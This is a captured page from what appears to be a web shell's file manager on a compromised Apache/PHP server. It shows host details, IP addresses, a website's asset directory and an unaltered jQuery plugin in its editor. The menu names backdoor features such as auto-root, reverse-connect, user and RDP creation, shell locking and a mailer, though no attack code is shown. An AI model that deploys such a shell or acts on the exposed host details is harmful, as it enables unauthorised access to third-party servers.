Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.139.236.144
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
logisys /
UNICLARE_files /
[ HOME SHELL ]
Name
Size
Permission
Action
Sc_1.png
47.8
KB
-rwxr-xr-x
Sc_5.png
20.33
KB
-rwxr-xr-x
Sc_6.png
52.45
KB
-rwxr-xr-x
Sc_7.png
40.79
KB
-rwxr-xr-x
Sc_8.png
19.44
KB
-rwxr-xr-x
all.css
52.34
KB
-rwxr-xr-x
android.png
13.63
KB
-rwxr-xr-x
animate.css
77.71
KB
-rwxr-xr-x
apple1.png
5.54
KB
-rwxr-xr-x
bootstrap.min.css
118.36
KB
-rwxr-xr-x
bootstrap.min.js
36.18
KB
-rwxr-xr-x
contact-form.js
2.55
KB
-rwxr-xr-x
counter.css
979
B
-rwxr-xr-x
counter.js
3.42
KB
-rwxr-xr-x
css
811
B
-rwxr-xr-x
font-awesome.min.css
28.38
KB
-rwxr-xr-x
icon1.png
12.01
KB
-rwxr-xr-x
icon2.png
14.05
KB
-rwxr-xr-x
icon3.png
23.19
KB
-rwxr-xr-x
iframe.html
538
B
-rwxr-xr-x
jquery-1.12.4.min.js
94.89
KB
-rwxr-xr-x
jquery-migrate-1.2.1.min.js
7.03
KB
-rwxr-xr-x
jquery-modal-video.min.js
6.15
KB
-rwxr-xr-x
jquery.ajaxchimp.js
5.46
KB
-rwxr-xr-x
jquery.appear.js
4.13
KB
-rwxr-xr-x
jquery.easing.1.3.js
9.12
KB
-rwxr-xr-x
jquery.sticky.js
9.75
KB
-rwxr-xr-x
main.js
7.79
KB
-rwxr-xr-x
material-icons.css
1.07
KB
-rwxr-xr-x
modal-video.min.css
2.02
KB
-rwxr-xr-x
modernizr-2.8.3.min.js
15.15
KB
-rwxr-xr-x
normalize.css
7.53
KB
-rwxr-xr-x
owl.carousel.css
4.12
KB
-rwxr-xr-x
owl.carousel.min.js
39.46
KB
-rwxr-xr-x
responsive.css
13.59
KB
-rwxr-xr-x
screen1.png
70.59
KB
-rwxr-xr-x
slick.css
1.73
KB
-rwxr-xr-x
slick.min.js
41.86
KB
-rwxr-xr-x
stellar.js
22.73
KB
-rwxr-xr-x
stellarnav.min.css
7.39
KB
-rwxr-xr-x
stellarnav.min.js
3.81
KB
-rwxr-xr-x
style.css
58.03
KB
-rwxr-xr-x
uini.png
6.74
KB
-rwxr-xr-x
wow.min.js
8.23
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jquery.appear.js
/* * jQuery.appear * https://github.com/bas2k/jquery.appear/ * http://code.google.com/p/jquery-appear/ * http://bas2k.ru/ * * Copyright (c) 2009 Michael Hixson * Copyright (c) 2012-2014 Alexander Brovikov * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php) */ (function($) { $.fn.appear = function(fn, options) { var settings = $.extend({ //arbitrary data to pass to fn data: undefined, //call fn only on the first appear? one: true, // X & Y accuracy accX: 0, accY: 0 }, options); return this.each(function() { var t = $(this); //whether the element is currently visible t.appeared = false; if (!fn) { //trigger the custom event t.trigger('appear', settings.data); return; } var w = $(window); //fires the appear event when appropriate var check = function() { //is the element hidden? if (!t.is(':visible')) { //it became hidden t.appeared = false; return; } //is the element inside the visible window? var a = w.scrollLeft(); var b = w.scrollTop(); var o = t.offset(); var x = o.left; var y = o.top; var ax = settings.accX; var ay = settings.accY; var th = t.height(); var wh = w.height(); var tw = t.width(); var ww = w.width(); if (y + th + ay >= b && y <= b + wh + ay && x + tw + ax >= a && x <= a + ww + ax) { //trigger the custom event if (!t.appeared) t.trigger('appear', settings.data); } else { //it scrolled out of view t.appeared = false; } }; //create a modified fn with some additional logic var modifiedFn = function() { //mark the element as visible t.appeared = true; //is this supposed to happen only once? if (settings.one) { //remove the check w.unbind('scroll', check); var i = $.inArray(check, $.fn.appear.checks); if (i >= 0) $.fn.appear.checks.splice(i, 1); } //trigger the original fn fn.apply(this, arguments); }; //bind the modified fn to the element if (settings.one) t.one('appear', settings.data, modifiedFn); else t.bind('appear', settings.data, modifiedFn); //check whenever the window scrolls w.scroll(check); //check whenever the dom changes $.fn.appear.checks.push(check); //check now (check)(); }); }; //keep a queue of appearance checks $.extend($.fn.appear, { checks: [], timeout: null, //process the queue checkAll: function() { var length = $.fn.appear.checks.length; if (length > 0) while (length--) ($.fn.appear.checks[length])(); }, //check the queue asynchronously run: function() { if ($.fn.appear.timeout) clearTimeout($.fn.appear.timeout); $.fn.appear.timeout = setTimeout($.fn.appear.checkAll, 20); } }); //run checks when these methods are called $.each(['append', 'prepend', 'after', 'before', 'attr', 'removeAttr', 'addClass', 'removeClass', 'toggleClass', 'remove', 'css', 'show', 'hide'], function(i, n) { var old = $.fn[n]; if (old) { $.fn[n] = function() { var r = old.apply(this, arguments); $.fn.appear.run(); return r; } } }); })(jQuery);
Close